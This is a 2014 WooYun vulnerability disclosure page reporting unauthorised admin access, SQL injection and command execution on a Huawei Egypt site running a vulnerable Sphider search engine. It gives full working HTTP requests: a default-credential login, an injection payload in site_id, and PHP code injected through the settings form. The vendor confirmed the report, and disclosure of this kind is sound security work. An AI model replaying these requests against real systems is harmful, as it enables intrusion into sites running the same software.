华为某站点多处漏洞（命令执行等） | wooyun-2014-071590| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-071590

漏洞标题：华为某站点多处漏洞（命令执行等）

漏洞作者：白非白

提交时间：2014-08-08 18:44

修复时间：2014-09-22 18:46

公开时间：2014-09-22 18:46

漏洞类型：命令执行

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-08-08：细节已通知厂商并且等待厂商处理中
2014-08-12：厂商已经确认，细节仅向厂商公开
2014-08-22：细节向核心白帽子及相关领域专家公开
2014-09-01：细节向普通白帽子公开
2014-09-11：细节向实习白帽子公开
2014-09-22：细节向公众公开

简要描述：

1.后台未授权访问
2.sql注入
3.命令执行

详细说明：

问题点：http://www.huaweidevice.com.eg/huawei_ar/sphider/admin/admin.php
使用了有漏洞的sphider版本。
1.后台未授权访问
request：

POST /huawei_ar/sphider/admin/admin.php HTTP/1.1
Host: www.huaweidevice.com.eg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 19
user=admin&pass=bar

2.sql注入
request：

POST /huawei_ar/sphider/admin/admin.php HTTP/1.1
Host: www.huaweidevice.com.eg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
user=foo&pass=bar&f=20&site_id=1%df'

3.命令执行
request;（获取 phpversion（））

POST /huawei_ar/sphider/admin/admin.php HTTP/1.1
Host: www.huaweidevice.com.eg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=7fabfda77b710466db1a18d65031fa66
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 523
user=foo&pass=bar&f=settings&Submit=ion_nr=1.3.5&_language=en&_template=standard&_admin_email=admin%40localhost&_tmp_dir=tmp&_log_dir=log&_log_format=html&_min_words_per_page=10&_min_word_length=3&_word_upper_bound=100&_pdftotext_path=&_catdoc_path=&_xls2csv_path=&_catppt_path=&_user_agent=&_min_delay=0&_results_per_page=10&_cat_columns=2&_bound_search_result=0&_length_of_link_desc=0&_links_to_next=9&_desc_length=250&_suggest_rows=0&_title_weight=20&_domain_weight=60&_path_weight=10&_meta_weight=5;echo%20phpversion();

漏洞证明：

修复方案：

shell什么的就不用了吧？

版权声明：转载请注明来源白非白@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2014-08-12 11:19

厂商回复：

感谢白帽子对华为公司的关注，相关的业务部门正在修补该漏洞信息。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-071590

漏洞标题：华为某站点多处漏洞（命令执行等）

相关厂商：华为技术有限公司

漏洞作者：白非白

提交时间：2014-08-08 18:44

修复时间：2014-09-22 18:46

公开时间：2014-09-22 18:46

漏洞类型：命令执行

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源白非白@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-071590

漏洞标题：华为某站点多处漏洞（命令执行等）

相关厂商：华为技术有限公司

漏洞作者： 白非白

提交时间：2014-08-08 18:44

修复时间：2014-09-22 18:46

公开时间：2014-09-22 18:46

漏洞类型：命令执行

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-071590"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 白非白@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：白非白

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源白非白@乌云